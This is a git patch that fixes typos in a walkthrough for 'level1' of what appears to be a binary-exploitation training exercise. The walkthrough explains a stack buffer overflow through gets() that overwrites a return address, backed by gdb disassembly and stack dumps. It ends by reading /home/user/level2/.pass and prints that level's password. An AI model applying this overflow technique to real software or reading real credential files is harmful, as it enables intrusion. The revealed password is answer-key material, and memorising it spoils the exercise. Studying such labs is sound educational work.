From 8327c2060363002b8029c93fc357023391b123e0 Mon Sep 17 00:00:00 2001 From: gbrochar Date: Mon, 19 May 2025 17:14:08 +0200 Subject: [PATCH] fix: level1 walkthrough typos --- level1/Ressources/{walktrough.md => walkthrough.md} | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) rename level1/Ressources/{walktrough.md => walkthrough.md} (91%) diff --git a/level1/Ressources/walktrough.md b/level1/Ressources/walkthrough.md similarity index 91% rename from level1/Ressources/walktrough.md rename to level1/Ressources/walkthrough.md index 1326a00..4f88824 100644 --- a/level1/Ressources/walktrough.md +++ b/level1/Ressources/walkthrough.md @@ -1,6 +1,6 @@ Code has 2 functions which are interesting, main and run. We need to execute run, for this we are going to use a buffer overflow attack. -For this we've got to input more than the 64 bits allocated for gets command. +For this we've got to input more than the 64 bytes allocated for gets command. We are going to override the stack so the ret command jump to run function. ``` @@ -32,8 +32,7 @@ We are going to override the stack so the ret command jump to run function. 0x0804847e : leave 0x0804847f : ret ``` - -Fig 1. Disassembly of main and run functions +*Fig 1. Disassembly of main and run functions* The first step is to find where the ret address is stored, for this, we will stop the program just before it begins running main and check esp register's @@ -51,6 +50,7 @@ Breakpoint 1, 0x08048480 in main () $1 = (void *) 0xbffff73c (gdb) ``` +*Fig 2. getting the ret address' position on the stack* Now we need to go to the gets and input 64 random characters and try to see them on the stack @@ -75,6 +75,7 @@ Breakpoint 1, 0x08048495 in main () 0xbffff750: 0x00 0x00 0x00 0x00 0x1c 0xf7 0xff 0xbf 0xbffff758: 0xdc 0xf7 0xff 0xbf 0x00 0x00 0x00 0x00 ``` +*Fig 3. Examining the stack after inputing 64 'A's* We can see our 64 'A's in the stack, notice there is some space before 0xbffff73c. That means we still need to put more 'A's, 12 precisely, then the address we want @@ -89,5 +90,6 @@ level2 cat /home/user/level2/.pass 53a4a712787f40ec66c3c26c1f4b164dcad5552b038bb0addd69bf5bf6fa8e77 ``` +*Fig 4. Successfully opening a shell as level2* :)